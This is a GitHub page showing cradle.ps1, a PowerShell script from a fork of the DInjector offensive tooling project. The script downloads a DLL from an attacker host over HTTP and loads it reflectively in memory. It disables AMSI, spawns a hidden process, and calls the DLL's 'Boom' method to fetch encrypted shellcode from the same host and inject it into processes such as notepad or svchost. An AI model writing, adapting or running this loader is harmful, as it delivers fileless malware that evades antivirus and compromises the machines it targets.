forked from NYAN-x-CAT/DInjector
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcradle.ps1
More file actions
42 lines (28 loc) · 824 Bytes
/
cradle.ps1
File metadata and controls
42 lines (28 loc) · 824 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# MODULE
$M = "currentthread"
# LHOST
$H = "10.10.13.37"
# AMSI
$A = "true"
# DLL
$D = "DInjector.dll"
# SHELLCODE
$S = "enc"
# PASSWORD
$P = "Passw0rd!"
# PROCESS
$N = "notepad"
# IMAGE
$I = "C:\Windows\System32\svchost.exe"
# --------------------------------------------------------------------
$methods = @("remotethread", "remotethreadsuspended")
if ($methods.Contains($M)) {
$N = (Start-Process -WindowStyle Hidden -PassThru $N).Id
}
$cmd = "$M /am51:$A /sc:http://$H/$S /password:$P /pid:$N /image:$I"
$data = (IWR -UseBasicParsing "http://$H/$D").Content
$assem = [System.Reflection.Assembly]::Load($data)
$flags = [Reflection.BindingFlags] "NonPublic,Static"
$class = $assem.GetType("DInjector.Detonator", $flags)
$entry = $class.GetMethod("Boom", $flags)
$entry.Invoke($null, (, $cmd.Split(" ")))